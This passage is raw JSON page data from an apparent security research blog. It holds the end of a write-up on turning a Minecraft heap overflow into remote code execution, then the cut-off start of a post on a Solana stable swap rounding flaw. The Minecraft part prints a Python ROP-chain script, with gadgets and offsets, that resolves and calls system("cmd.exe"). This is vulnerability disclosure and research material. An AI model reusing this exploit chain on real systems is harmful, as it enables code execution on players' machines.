",{"type":24,"tag":145,"props":9153,"children":9155},{"className":9154},[],[9156],{"type":30,"value":9157},"system(\"cmd.exe\")",{"type":30,"value":9159},". Because Minecraft does not use ",{"type":24,"tag":145,"props":9161,"children":9163},{"className":9162},[],[9164],{"type":30,"value":9165},"system",{"type":30,"value":9167},", the symbol is not imported, so the chain must resolve it dynamically.",{"type":24,"tag":32,"props":9169,"children":9170},{},[9171,9173,9179,9181,9187,9189,9194,9196,9202,9204,9209],{"type":30,"value":9172},"This is straightforward: the chain first calls ",{"type":24,"tag":145,"props":9174,"children":9176},{"className":9175},[],[9177],{"type":30,"value":9178},"GetModuleHandle(\"ucrtbase.dll\")",{"type":30,"value":9180}," to obtain the base address of ",{"type":24,"tag":145,"props":9182,"children":9184},{"className":9183},[],[9185],{"type":30,"value":9186},"ucrtbase.dll",{"type":30,"value":9188}," (which exports ",{"type":24,"tag":145,"props":9190,"children":9192},{"className":9191},[],[9193],{"type":30,"value":9165},{"type":30,"value":9195},"). It then calls ",{"type":24,"tag":145,"props":9197,"children":9199},{"className":9198},[],[9200],{"type":30,"value":9201},"GetProcAddress(ucrtbase_addr, \"system\")",{"type":30,"value":9203}," to retrieve the function’s address. Finally, it invokes ",{"type":24,"tag":145,"props":9205,"children":9207},{"className":9206},[],[9208],{"type":30,"value":9165},{"type":30,"value":9210}," with the \"cmd.exe\" string.",{"type":24,"tag":32,"props":9212,"children":9213},{},[9214],{"type":30,"value":9215},"In the exploit script, the ROP chain looks something like this:",{"type":24,"tag":291,"props":9217,"children":9221},{"code":9218,"language":9219,"meta":7,"className":9220,"style":7},"# get the address of `GetModuleHandle` to `rax`\nrop.gadget(pop_r8)\nrop.gadget(addr_get_module_handle_a - 0x28)\n# 0x0000000145dcd83d : mov rax, qword ptr [r8 + 0x28] ; ret\nrop.gadget(mov_rax_r8_28)\n\n# call `GetModuleHandle(\"ucrtbase.dll\")`\nrop.gadget(pop_rcx)\nrop.gadget(0x7468B68) # offset of \"ucrtbase.dll\" string\nrop.gadget(ret) # movaps alignment\nrop.gadget(push_rax_ret) # calls `GetModuleHandle`\nrop.literal(u64(b\"ucrtbase\"))\nrop.literal(u64(b\".dll\\x00\\x00\\x00\\x00\"))\nrop.literal(u64(b\"system\\x00\\x00\"))\n\n# call `GetProcAddress(ucrtbase_base, \"system\")`\nrop.gadget(xchg_rcx_rax) # move the return value of `GetModuleHandle` to rcx\nrop.gadget(pop_rdx)\nrop.gadget(0x7468B68 + 0x10) # offset of \"system\" string\nrop.gadget(get_proc_addr)\n\n# call `system(\"cmd.exe\")`\nrop.gadget(pop_rcx)\nrop.gadget(0x7468DB8) # offset of \"cmd.exe\" string\nrop.gadget(ret) # movaps alignment\nrop.gadget(push_rax_ret) # calls `system`\nrop.literal(u64(b\"cmd.exe\\x00\"))\n","python","language-python shiki shiki-themes slack-dark",[9222],{"type":24,"tag":145,"props":9223,"children":9224},{"__ignoreMap":7},[9225,9233,9241,9268,9276,9284,9291,9299,9307,9334,9347,9360,9382,9413,9442,9449,9457,9470,9478,9515,9523,9530,9538,9545,9570,9581,9593],{"type":24,"tag":301,"props":9226,"children":9227},{"class":303,"line":304},[9228],{"type":24,"tag":301,"props":9229,"children":9230},{"style":1062},[9231],{"type":30,"value":9232},"# get the address of `GetModuleHandle` to `rax`\n",{"type":24,"tag":301,"props":9234,"children":9235},{"class":303,"line":320},[9236],{"type":24,"tag":301,"props":9237,"children":9238},{"style":359},[9239],{"type":30,"value":9240},"rop.gadget(pop_r8)\n",{"type":24,"tag":301,"props":9242,"children":9243},{"class":303,"line":335},[9244,9249,9254,9259,9264],{"type":24,"tag":301,"props":9245,"children":9246},{"style":359},[9247],{"type":30,"value":9248},"rop.gadget(addr_get_module_handle_a ",{"type":24,"tag":301,"props":9250,"children":9251},{"style":385},[9252],{"type":30,"value":9253},"-",{"type":24,"tag":301,"props":9255,"children":9256},{"style":348},[9257],{"type":30,"value":9258}," 0x",{"type":24,"tag":301,"props":9260,"children":9261},{"style":466},[9262],{"type":30,"value":9263},"28",{"type":24,"tag":301,"props":9265,"children":9266},{"style":359},[9267],{"type":30,"value":791},{"type":24,"tag":301,"props":9269,"children":9270},{"class":303,"line":344},[9271],{"type":24,"tag":301,"props":9272,"children":9273},{"style":1062},[9274],{"type":30,"value":9275},"# 0x0000000145dcd83d : mov rax, qword ptr [r8 + 0x28] ; ret\n",{"type":24,"tag":301,"props":9277,"children":9278},{"class":303,"line":401},[9279],{"type":24,"tag":301,"props":9280,"children":9281},{"style":359},[9282],{"type":30,"value":9283},"rop.gadget(mov_rax_r8_28)\n",{"type":24,"tag":301,"props":9285,"children":9286},{"class":303,"line":415},[9287],{"type":24,"tag":301,"props":9288,"children":9289},{"emptyLinePlaceholder":16},[9290],{"type":30,"value":341},{"type":24,"tag":301,"props":9292,"children":9293},{"class":303,"line":439},[9294],{"type":24,"tag":301,"props":9295,"children":9296},{"style":1062},[9297],{"type":30,"value":9298},"# call `GetModuleHandle(\"ucrtbase.dll\")`\n",{"type":24,"tag":301,"props":9300,"children":9301},{"class":303,"line":447},[9302],{"type":24,"tag":301,"props":9303,"children":9304},{"style":359},[9305],{"type":30,"value":9306},"rop.gadget(pop_rcx)\n",{"type":24,"tag":301,"props":9308,"children":9309},{"class":303,"line":476},[9310,9315,9320,9325,9329],{"type":24,"tag":301,"props":9311,"children":9312},{"style":359},[9313],{"type":30,"value":9314},"rop.gadget(",{"type":24,"tag":301,"props":9316,"children":9317},{"style":348},[9318],{"type":30,"value":9319},"0x",{"type":24,"tag":301,"props":9321,"children":9322},{"style":466},[9323],{"type":30,"value":9324},"7468B68",{"type":24,"tag":301,"props":9326,"children":9327},{"style":359},[9328],{"type":30,"value":911},{"type":24,"tag":301,"props":9330,"children":9331},{"style":1062},[9332],{"type":30,"value":9333},"# offset of \"ucrtbase.dll\" string\n",{"type":24,"tag":301,"props":9335,"children":9336},{"class":303,"line":495},[9337,9342],{"type":24,"tag":301,"props":9338,"children":9339},{"style":359},[9340],{"type":30,"value":9341},"rop.gadget(ret) ",{"type":24,"tag":301,"props":9343,"children":9344},{"style":1062},[9345],{"type":30,"value":9346},"# movaps alignment\n",{"type":24,"tag":301,"props":9348,"children":9349},{"class":303,"line":504},[9350,9355],{"type":24,"tag":301,"props":9351,"children":9352},{"style":359},[9353],{"type":30,"value":9354},"rop.gadget(push_rax_ret) ",{"type":24,"tag":301,"props":9356,"children":9357},{"style":1062},[9358],{"type":30,"value":9359},"# calls `GetModuleHandle`\n",{"type":24,"tag":301,"props":9361,"children":9362},{"class":303,"line":512},[9363,9368,9372,9377],{"type":24,"tag":301,"props":9364,"children":9365},{"style":359},[9366],{"type":30,"value":9367},"rop.literal(u64(",{"type":24,"tag":301,"props":9369,"children":9370},{"style":348},[9371],{"type":30,"value":5613},{"type":24,"tag":301,"props":9373,"children":9374},{"style":329},[9375],{"type":30,"value":9376},"\"ucrtbase\"",{"type":24,"tag":301,"props":9378,"children":9379},{"style":359},[9380],{"type":30,"value":9381},"))\n",{"type":24,"tag":301,"props":9383,"children":9384},{"class":303,"line":592},[9385,9389,9393,9398,9404,9409],{"type":24,"tag":301,"props":9386,"children":9387},{"style":359},[9388],{"type":30,"value":9367},{"type":24,"tag":301,"props":9390,"children":9391},{"style":348},[9392],{"type":30,"value":5613},{"type":24,"tag":301,"props":9394,"children":9395},{"style":329},[9396],{"type":30,"value":9397},"\".dll",{"type":24,"tag":301,"props":9399,"children":9401},{"style":9400},"--shiki-default:#D7BA7D",[9402],{"type":30,"value":9403},"\\x00\\x00\\x00\\x00",{"type":24,"tag":301,"props":9405,"children":9406},{"style":329},[9407],{"type":30,"value":9408},"\"",{"type":24,"tag":301,"props":9410,"children":9411},{"style":359},[9412],{"type":30,"value":9381},{"type":24,"tag":301,"props":9414,"children":9415},{"class":303,"line":619},[9416,9420,9424,9429,9434,9438],{"type":24,"tag":301,"props":9417,"children":9418},{"style":359},[9419],{"type":30,"value":9367},{"type":24,"tag":301,"props":9421,"children":9422},{"style":348},[9423],{"type":30,"value":5613},{"type":24,"tag":301,"props":9425,"children":9426},{"style":329},[9427],{"type":30,"value":9428},"\"system",{"type":24,"tag":301,"props":9430,"children":9431},{"style":9400},[9432],{"type":30,"value":9433},"\\x00\\x00",{"type":24,"tag":301,"props":9435,"children":9436},{"style":329},[9437],{"type":30,"value":9408},{"type":24,"tag":301,"props":9439,"children":9440},{"style":359},[9441],{"type":30,"value":9381},{"type":24,"tag":301,"props":9443,"children":9444},{"class":303,"line":635},[9445],{"type":24,"tag":301,"props":9446,"children":9447},{"emptyLinePlaceholder":16},[9448],{"type":30,"value":341},{"type":24,"tag":301,"props":9450,"children":9451},{"class":303,"line":643},[9452],{"type":24,"tag":301,"props":9453,"children":9454},{"style":1062},[9455],{"type":30,"value":9456},"# call `GetProcAddress(ucrtbase_base, \"system\")`\n",{"type":24,"tag":301,"props":9458,"children":9459},{"class":303,"line":652},[9460,9465],{"type":24,"tag":301,"props":9461,"children":9462},{"style":359},[9463],{"type":30,"value":9464},"rop.gadget(xchg_rcx_rax) ",{"type":24,"tag":301,"props":9466,"children":9467},{"style":1062},[9468],{"type":30,"value":9469},"# move the return value of `GetModuleHandle` to rcx\n",{"type":24,"tag":301,"props":9471,"children":9472},{"class":303,"line":666},[9473],{"type":24,"tag":301,"props":9474,"children":9475},{"style":359},[9476],{"type":30,"value":9477},"rop.gadget(pop_rdx)\n",{"type":24,"tag":301,"props":9479,"children":9480},{"class":303,"line":674},[9481,9485,9489,9493,9497,9501,9506,9510],{"type":24,"tag":301,"props":9482,"children":9483},{"style":359},[9484],{"type":30,"value":9314},{"type":24,"tag":301,"props":9486,"children":9487},{"style":348},[9488],{"type":30,"value":9319},{"type":24,"tag":301,"props":9490,"children":9491},{"style":466},[9492],{"type":30,"value":9324},{"type":24,"tag":301,"props":9494,"children":9495},{"style":385},[9496],{"type":30,"value":957},{"type":24,"tag":301,"props":9498,"children":9499},{"style":348},[9500],{"type":30,"value":9258},{"type":24,"tag":301,"props":9502,"children":9503},{"style":466},[9504],{"type":30,"value":9505},"10",{"type":24,"tag":301,"props":9507,"children":9508},{"style":359},[9509],{"type":30,"value":911},{"type":24,"tag":301,"props":9511,"children":9512},{"style":1062},[9513],{"type":30,"value":9514},"# offset of \"system\" string\n",{"type":24,"tag":301,"props":9516,"children":9517},{"class":303,"line":692},[9518],{"type":24,"tag":301,"props":9519,"children":9520},{"style":359},[9521],{"type":30,"value":9522},"rop.gadget(get_proc_addr)\n",{"type":24,"tag":301,"props":9524,"children":9525},{"class":303,"line":3631},[9526],{"type":24,"tag":301,"props":9527,"children":9528},{"emptyLinePlaceholder":16},[9529],{"type":30,"value":341},{"type":24,"tag":301,"props":9531,"children":9532},{"class":303,"line":3639},[9533],{"type":24,"tag":301,"props":9534,"children":9535},{"style":1062},[9536],{"type":30,"value":9537},"# call `system(\"cmd.exe\")`\n",{"type":24,"tag":301,"props":9539,"children":9540},{"class":303,"line":3647},[9541],{"type":24,"tag":301,"props":9542,"children":9543},{"style":359},[9544],{"type":30,"value":9306},{"type":24,"tag":301,"props":9546,"children":9547},{"class":303,"line":3685},[9548,9552,9556,9561,9565],{"type":24,"tag":301,"props":9549,"children":9550},{"style":359},[9551],{"type":30,"value":9314},{"type":24,"tag":301,"props":9553,"children":9554},{"style":348},[9555],{"type":30,"value":9319},{"type":24,"tag":301,"props":9557,"children":9558},{"style":466},[9559],{"type":30,"value":9560},"7468DB8",{"type":24,"tag":301,"props":9562,"children":9563},{"style":359},[9564],{"type":30,"value":911},{"type":24,"tag":301,"props":9566,"children":9567},{"style":1062},[9568],{"type":30,"value":9569},"# offset of \"cmd.exe\" string\n",{"type":24,"tag":301,"props":9571,"children":9572},{"class":303,"line":3713},[9573,9577],{"type":24,"tag":301,"props":9574,"children":9575},{"style":359},[9576],{"type":30,"value":9341},{"type":24,"tag":301,"props":9578,"children":9579},{"style":1062},[9580],{"type":30,"value":9346},{"type":24,"tag":301,"props":9582,"children":9583},{"class":303,"line":3721},[9584,9588],{"type":24,"tag":301,"props":9585,"children":9586},{"style":359},[9587],{"type":30,"value":9354},{"type":24,"tag":301,"props":9589,"children":9590},{"style":1062},[9591],{"type":30,"value":9592},"# calls `system`\n",{"type":24,"tag":301,"props":9594,"children":9595},{"class":303,"line":3751},[9596,9600,9604,9609,9614,9618],{"type":24,"tag":301,"props":9597,"children":9598},{"style":359},[9599],{"type":30,"value":9367},{"type":24,"tag":301,"props":9601,"children":9602},{"style":348},[9603],{"type":30,"value":5613},{"type":24,"tag":301,"props":9605,"children":9606},{"style":329},[9607],{"type":30,"value":9608},"\"cmd.exe",{"type":24,"tag":301,"props":9610,"children":9611},{"style":9400},[9612],{"type":30,"value":9613},"\\x00",{"type":24,"tag":301,"props":9615,"children":9616},{"style":329},[9617],{"type":30,"value":9408},{"type":24,"tag":301,"props":9619,"children":9620},{"style":359},[9621],{"type":30,"value":9381},{"type":24,"tag":80,"props":9623,"children":9625},{"id":9624},"demo",[9626],{"type":30,"value":9627},"Demo",{"type":24,"tag":32,"props":9629,"children":9630},{},[9631],{"type":30,"value":9632},"The demo video below shows a Molang script achieving arbitrary read and write primitives to execute the previous ROP chain:",{"type":24,"tag":9634,"props":9635,"children":9639},"video",{"className":9636,"controls":16},[9637,9638],"blog-video-responsive","blog-video-wide",[9640,9642,9648],{"type":30,"value":9641},"\n ",{"type":24,"tag":9643,"props":9644,"children":9647},"source",{"src":9645,"type":9646},"/posts/minecraft-heap-overflow-to-rce/demo.mp4","video/mp4",[],{"type":30,"value":9649},"\n Your browser does not support the video tag.\n",{"type":24,"tag":43,"props":9651,"children":9653},{"id":9652},"conclusion",[9654],{"type":30,"value":9655},"Conclusion",{"type":24,"tag":32,"props":9657,"children":9658},{},[9659],{"type":30,"value":9660},"This blog post is quite long, which reflects how modern mitigations make remote exploitation highly cumbersome - but still not impossible.",{"type":24,"tag":32,"props":9662,"children":9663},{},[9664],{"type":30,"value":9665},"It also demonstrates an interesting technique of abusing Molang to achieve RCE without relying on client information leaks.",{"type":24,"tag":32,"props":9667,"children":9668},{},[9669],{"type":30,"value":9670},"Finally, it highlights an underexplored area in security: video games. Even massively popular games like Minecraft contain large, complex, and unexplored attack surfaces.",{"type":24,"tag":9672,"props":9673,"children":9674},"style",{},[9675],{"type":30,"value":9676},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":320,"depth":320,"links":9678},[9679,9683,9688,9699],{"id":45,"depth":320,"text":48,"children":9680},[9681,9682],{"id":82,"depth":335,"text":85},{"id":98,"depth":335,"text":101},{"id":119,"depth":320,"text":122,"children":9684},[9685,9686,9687],{"id":135,"depth":335,"text":138},{"id":230,"depth":335,"text":233},{"id":2650,"depth":335,"text":2653},{"id":2746,"depth":320,"text":2749,"children":9689},[9690,9691,9692,9693,9694,9695,9696,9697,9698],{"id":2762,"depth":335,"text":2765},{"id":2787,"depth":335,"text":2790},{"id":2924,"depth":335,"text":2927},{"id":5179,"depth":335,"text":5182},{"id":5546,"depth":335,"text":5549},{"id":6383,"depth":335,"text":6386},{"id":8517,"depth":335,"text":8520},{"id":9143,"depth":335,"text":9146},{"id":9624,"depth":335,"text":9627},{"id":9652,"depth":320,"text":9655},"markdown","content:blog:2026-06-02-minecraft-heap-overflow-to-rce.md","content","blog/2026-06-02-minecraft-heap-overflow-to-rce.md","blog/2026-06-02-minecraft-heap-overflow-to-rce","md",[9707,12202,12536,16066,20410,25523,35758,37189,37951,42167,47183,52610,53767,57251,67626,74353,76192,77901,82565,96453,99170,103958,106397,108742,114526,130343,138627,148543,153820],{"_path":9708,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":9709,"description":9710,"image":9711,"date":9715,"isFeatured":16,"tags":9716,"onBlogPage":16,"body":9719,"_type":9700,"_id":12199,"_source":9702,"_file":12200,"_stem":12201,"_extension":9705},"/blog/2022-04-26-spl-swap-rounding","Becoming a Millionaire, 0.000150 BTC at a Time","How we discovered a critical issue in Solana's stable swap implementation. A story about arbitrage and rounding.",{"src":9712,"width":9713,"height":9714},"/posts/spl-swap/title.jpg",600,368,"2022-04-26",[9717,9718],"solana","report",{"type":21,"children":9720,"toc":12193},[9721,9735,9740,9745,9753,9759,9764,9769,9778,9786,9791,9796,9804,9809,9814,10183,10193,10198,10724,10729,10737,10744,10750,10755,10760,10765,10772,10784,10789,10801,11039,11044,11049,11055,11060,11065,11111,11116,11124,11129,11134,11139,11283,11296,11409,11423,11431,11445,11453,11466,11471,11483,11491,11513,12131,12137,12142,12154,12167,12174,12179,12184,12189],{"type":24,"tag":32,"props":9722,"children":9723},{},[9724,9726,9733],{"type":30,"value":9725},"We discovered a critical rounding issue in the Solana Program Library's implementation of stable swap, ",{"type":24,"tag":188,"props":9727,"children":9730},{"href":9728,"rel":9729},"https://github.com/solana-labs/solana-program-library/tree/master/token-swap/program",[192],[9731],{"type":30,"value":9732},"spl-token-swap",{"type":30,"value":9734},". Similar to Neodyme's spl-token-lending exploit, we were able to extract a single token per instruction. This exceeds the value of the 5000 lamport transaction fee on BTC stable swaps, allowing an attacker to profitably drain funds.",{"type":24,"tag":32,"props":9736,"children":9737},{},[9738],{"type":30,"value":9739},"Such BTC stable swaps had over 74 million in combined value. The total value of stable swaps impacted exceed 700 million.",{"type":24,"tag":32,"props":9741,"children":9742},{},[9743],{"type":30,"value":9744},"We would also like to thank the Saber team for their fast triage and remediation.",{"type":24,"tag":32,"props":9746,"children":9747},{},[9748],{"type":24,"tag":5422,"props":9749,"children":9750},{},[9751],{"type":30,"value":9752},"Rounding bugs are an increasingly common vulnerability class, enabled by low transaction costs",{"type":24,"tag":43,"props":9754,"children":9756},{"id":9755},"discovery",[9757],{"type":30,"value":9758},"Discovery",{"type":24,"tag":32,"props":9760,"children":9761},{},[9762],{"type":30,"value":9763},"Parth, one of our researchers, was implementing a graph search for our arbitrage bot to calculate the price of any token relative to SOL.",{"type":24,"tag":32,"props":9765,"children":9766},{},[9767],{"type":30,"value":9768},"After a while, he noticed something weird..",{"type":24,"tag":9770,"props":9771,"children":9772},"blockquote",{},[9773],{"type":24,"tag":32,"props":9774,"children":9775},{},[9776],{"type":30,"value":9777},"so either my graph search is wrong\nor its possible to get a ton of money out of nothing",{"type":24,"tag":291,"props":9779,"children":9781},{"code":9780},"KwnjUuZ : 0 9vMJfxu -> 1 EPjFWdd\nKwnjUuZ : 1 EPjFWdd -> 2 9vMJfxu\nKwnjUuZ : 2 9vMJfxu -> 3 EPjFWdd\nHU1tejU : 3 EPjFWdd -> 625 PRT88Rk\n24ZbKS3 : 625 PRT88Rk -> 7 EPjFWdd\n3oRPcFa : 7 EPjFWdd -> 6 BQcdHdA\n",[9782],{"type":24,"tag":145,"props":9783,"children":9784},{"__ignoreMap":7},[9785],{"type":30,"value":9780},{"type":24,"tag":32,"props":9787,"children":9788},{},[9789],{"type":30,"value":9790},"Somehow, we were getting tokens from nothing?",{"type":24,"tag":32,"props":9792,"children":9793},{},[9794],{"type":30,"value":9795},"After taking a look at the pairs on which this was occuring, we quickly realized that only stable swap pairs were impacted.",{"type":24,"tag":291,"props":9797,"children":9799},{"code":9798},"KwnjUuZhTMTSGAaavkLEmSyfobY16JNH4poL9oeeEvE\nHU1tejUtt7AZYrC9SAuqCW9MpuSqsdoedHSb1XUKjUPN\n24ZbKS36rkPv14Tdx8qv4NRyqatTaJ5KgJrT1LxBKn5d\n3oRPcFaRHvv9pPR6nRasigVDkm3k9kTjdfjxUpgLV5Pq\n",[9800],{"type":24,"tag":145,"props":9801,"children":9802},{"__ignoreMap":7},[9803],{"type":30,"value":9798},{"type":24,"tag":32,"props":9805,"children":9806},{},[9807],{"type":30,"value":9808},"This seemed suspicious. Perhaps it had something to do with the stable swap math?",{"type":24,"tag":32,"props":9810,"children":9811},{},[9812],{"type":30,"value":9813},"It was also weird how we could only ever get at most one extra token. As usual, the best way to answer such questions is to read the code. We dived into the stable swap Solana implementation to look for a possible root cause.",{"type":24,"tag":291,"props":9815,"children":9819},{"code":9816,"language":9817,"meta":7,"className":9818,"style":7}," // Solve for y by approximating: y**2 + b*y = c\n let mut y = d_val;\n for _ in 0..ITERATIONS {\n let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n if y_new == y {\n break;\n } else {\n y = y_new;\n }\n }\n","rust","language-rust shiki shiki-themes slack-dark",[9820],{"type":24,"tag":145,"props":9821,"children":9822},{"__ignoreMap":7},[9823,9831,9862,9893,9992,10096,10120,10132,10149,10169,10176],{"type":24,"tag":301,"props":9824,"children":9825},{"class":303,"line":304},[9826],{"type":24,"tag":301,"props":9827,"children":9828},{"style":1062},[9829],{"type":30,"value":9830}," // Solve for y by approximating: y**2 + b*y = c\n",{"type":24,"tag":301,"props":9832,"children":9833},{"class":303,"line":320},[9834,9839,9844,9849,9853,9858],{"type":24,"tag":301,"props":9835,"children":9836},{"style":348},[9837],{"type":30,"value":9838}," let",{"type":24,"tag":301,"props":9840,"children":9841},{"style":348},[9842],{"type":30,"value":9843}," mut",{"type":24,"tag":301,"props":9845,"children":9846},{"style":369},[9847],{"type":30,"value":9848}," y",{"type":24,"tag":301,"props":9850,"children":9851},{"style":385},[9852],{"type":30,"value":2537},{"type":24,"tag":301,"props":9854,"children":9855},{"style":369},[9856],{"type":30,"value":9857}," d_val",{"type":24,"tag":301,"props":9859,"children":9860},{"style":359},[9861],{"type":30,"value":492},{"type":24,"tag":301,"props":9863,"children":9864},{"class":303,"line":335},[9865,9869,9874,9879,9883,9888],{"type":24,"tag":301,"props":9866,"children":9867},{"style":308},[9868],{"type":30,"value":3249},{"type":24,"tag":301,"props":9870,"children":9871},{"style":369},[9872],{"type":30,"value":9873}," _",{"type":24,"tag":301,"props":9875,"children":9876},{"style":348},[9877],{"type":30,"value":9878}," in",{"type":24,"tag":301,"props":9880,"children":9881},{"style":466},[9882],{"type":30,"value":685},{"type":24,"tag":301,"props":9884,"children":9885},{"style":385},[9886],{"type":30,"value":9887},"..",{"type":24,"tag":301,"props":9889,"children":9890},{"style":359},[9891],{"type":30,"value":9892},"ITERATIONS {\n",{"type":24,"tag":301,"props":9894,"children":9895},{"class":303,"line":344},[9896,9901,9905,9910,9914,9919,9923,9927,9931,9936,9940,9944,9949,9953,9957,9962,9967,9972,9976,9980,9984,9988],{"type":24,"tag":301,"props":9897,"children":9898},{"style":348},[9899],{"type":30,"value":9900}," let",{"type":24,"tag":301,"props":9902,"children":9903},{"style":359},[9904],{"type":30,"value":873},{"type":24,"tag":301,"props":9906,"children":9907},{"style":369},[9908],{"type":30,"value":9909},"y_new",{"type":24,"tag":301,"props":9911,"children":9912},{"style":359},[9913],{"type":30,"value":377},{"type":24,"tag":301,"props":9915,"children":9916},{"style":369},[9917],{"type":30,"value":9918},"_",{"type":24,"tag":301,"props":9920,"children":9921},{"style":359},[9922],{"type":30,"value":911},{"type":24,"tag":301,"props":9924,"children":9925},{"style":385},[9926],{"type":30,"value":523},{"type":24,"tag":301,"props":9928,"children":9929},{"style":359},[9930],{"type":30,"value":873},{"type":24,"tag":301,"props":9932,"children":9933},{"style":314},[9934],{"type":30,"value":9935},"checked_u8_power",{"type":24,"tag":301,"props":9937,"children":9938},{"style":359},[9939],{"type":30,"value":362},{"type":24,"tag":301,"props":9941,"children":9942},{"style":385},[9943],{"type":30,"value":556},{"type":24,"tag":301,"props":9945,"children":9946},{"style":369},[9947],{"type":30,"value":9948},"y",{"type":24,"tag":301,"props":9950,"children":9951},{"style":359},[9952],{"type":30,"value":377},{"type":24,"tag":301,"props":9954,"children":9955},{"style":466},[9956],{"type":30,"value":1503},{"type":24,"tag":301,"props":9958,"children":9959},{"style":359},[9960],{"type":30,"value":9961},")",{"type":24,"tag":301,"props":9963,"children":9964},{"style":385},[9965],{"type":30,"value":9966},"?.",{"type":24,"tag":301,"props":9968,"children":9969},{"style":314},[9970],{"type":30,"value":9971},"checked_add",{"type":24,"tag":301,"props":9973,"children":9974},{"style":359},[9975],{"type":30,"value":362},{"type":24,"tag":301,"props":9977,"children":9978},{"style":369},[9979],{"type":30,"value":294},{"type":24,"tag":301,"props":9981,"children":9982},{"style":359},[9983],{"type":30,"value":9961},{"type":24,"tag":301,"props":9985,"children":9986},{"style":385},[9987],{"type":30,"value":2003},{"type":24,"tag":301,"props":9989,"children":9990},{"style":359},[9991],{"type":30,"value":791},{"type":24,"tag":301,"props":9993,"children":9994},{"class":303,"line":401},[9995,10000,10005,10009,10014,10018,10022,10026,10030,10034,10038,10042,10046,10050,10054,10058,10062,10067,10071,10076,10080,10084,10088,10092],{"type":24,"tag":301,"props":9996,"children":9997},{"style":385},[9998],{"type":30,"value":9999}," .",{"type":24,"tag":301,"props":10001,"children":10002},{"style":314},[10003],{"type":30,"value":10004},"checked_ceil_div",{"type":24,"tag":301,"props":10006,"children":10007},{"style":359},[10008],{"type":30,"value":362},{"type":24,"tag":301,"props":10010,"children":10011},{"style":314},[10012],{"type":30,"value":10013},"checked_u8_mul",{"type":24,"tag":301,"props":10015,"children":10016},{"style":359},[10017],{"type":30,"value":362},{"type":24,"tag":301,"props":10019,"children":10020},{"style":385},[10021],{"type":30,"value":556},{"type":24,"tag":301,"props":10023,"children":10024},{"style":369},[10025],{"type":30,"value":9948},{"type":24,"tag":301,"props":10027,"children":10028},{"style":359},[10029],{"type":30,"value":377},{"type":24,"tag":301,"props":10031,"children":10032},{"style":466},[10033],{"type":30,"value":1503},{"type":24,"tag":301,"props":10035,"children":10036},{"style":359},[10037],{"type":30,"value":9961},{"type":24,"tag":301,"props":10039,"children":10040},{"style":385},[10041],{"type":30,"value":9966},{"type":24,"tag":301,"props":10043,"children":10044},{"style":314},[10045],{"type":30,"value":9971},{"type":24,"tag":301,"props":10047,"children":10048},{"style":359},[10049],{"type":30,"value":362},{"type":24,"tag":301,"props":10051,"children":10052},{"style":369},[10053],{"type":30,"value":5613},{"type":24,"tag":301,"props":10055,"children":10056},{"style":359},[10057],{"type":30,"value":9961},{"type":24,"tag":301,"props":10059,"children":10060},{"style":385},[10061],{"type":30,"value":9966},{"type":24,"tag":301,"props":10063,"children":10064},{"style":314},[10065],{"type":30,"value":10066},"checked_sub",{"type":24,"tag":301,"props":10068,"children":10069},{"style":359},[10070],{"type":30,"value":362},{"type":24,"tag":301,"props":10072,"children":10073},{"style":369},[10074],{"type":30,"value":10075},"d_val",{"type":24,"tag":301,"props":10077,"children":10078},{"style":359},[10079],{"type":30,"value":9961},{"type":24,"tag":301,"props":10081,"children":10082},{"style":385},[10083],{"type":30,"value":2003},{"type":24,"tag":301,"props":10085,"children":10086},{"style":359},[10087],{"type":30,"value":9961},{"type":24,"tag":301,"props":10089,"children":10090},{"style":385},[10091],{"type":30,"value":2003},{"type":24,"tag":301,"props":10093,"children":10094},{"style":359},[10095],{"type":30,"value":492},{"type":24,"tag":301,"props":10097,"children":10098},{"class":303,"line":415},[10099,10103,10108,10112,10116],{"type":24,"tag":301,"props":10100,"children":10101},{"style":308},[10102],{"type":30,"value":3285},{"type":24,"tag":301,"props":10104,"children":10105},{"style":369},[10106],{"type":30,"value":10107}," y_new",{"type":24,"tag":301,"props":10109,"children":10110},{"style":385},[10111],{"type":30,"value":2460},{"type":24,"tag":301,"props":10113,"children":10114},{"style":369},[10115],{"type":30,"value":9848},{"type":24,"tag":301,"props":10117,"children":10118},{"style":359},[10119],{"type":30,"value":3035},{"type":24,"tag":301,"props":10121,"children":10122},{"class":303,"line":439},[10123,10128],{"type":24,"tag":301,"props":10124,"children":10125},{"style":308},[10126],{"type":30,"value":10127}," break",{"type":24,"tag":301,"props":10129,"children":10130},{"style":359},[10131],{"type":30,"value":492},{"type":24,"tag":301,"props":10133,"children":10134},{"class":303,"line":447},[10135,10140,10145],{"type":24,"tag":301,"props":10136,"children":10137},{"style":359},[10138],{"type":30,"value":10139}," } ",{"type":24,"tag":301,"props":10141,"children":10142},{"style":308},[10143],{"type":30,"value":10144},"else",{"type":24,"tag":301,"props":10146,"children":10147},{"style":359},[10148],{"type":30,"value":3035},{"type":24,"tag":301,"props":10150,"children":10151},{"class":303,"line":476},[10152,10157,10161,10165],{"type":24,"tag":301,"props":10153,"children":10154},{"style":369},[10155],{"type":30,"value":10156}," y",{"type":24,"tag":301,"props":10158,"children":10159},{"style":385},[10160],{"type":30,"value":2537},{"type":24,"tag":301,"props":10162,"children":10163},{"style":369},[10164],{"type":30,"value":10107},{"type":24,"tag":301,"props":10166,"children":10167},{"style":359},[10168],{"type":30,"value":492},{"type":24,"tag":301,"props":10170,"children":10171},{"class":303,"line":495},[10172],{"type":24,"tag":301,"props":10173,"children":10174},{"style":359},[10175],{"type":30,"value":3345},{"type":24,"tag":301,"props":10177,"children":10178},{"class":303,"line":504},[10179],{"type":24,"tag":301,"props":10180,"children":10181},{"style":359},[10182],{"type":30,"value":501},{"type":24,"tag":32,"props":10184,"children":10185},{},[10186,10191],{"type":24,"tag":5422,"props":10187,"children":10188},{},[10189],{"type":30,"value":10190},"approximate",{"type":30,"value":10192},". Looks suspicious.. Perhaps we really did find a bug in the Solana Program Library?",{"type":24,"tag":32,"props":10194,"children":10195},{},[10196],{"type":30,"value":10197},"With this promising find in mind, we decided to throw together a quick proof of concept. To do this, we attempted to swap very small amounts of tokens back and forth between sBTC and 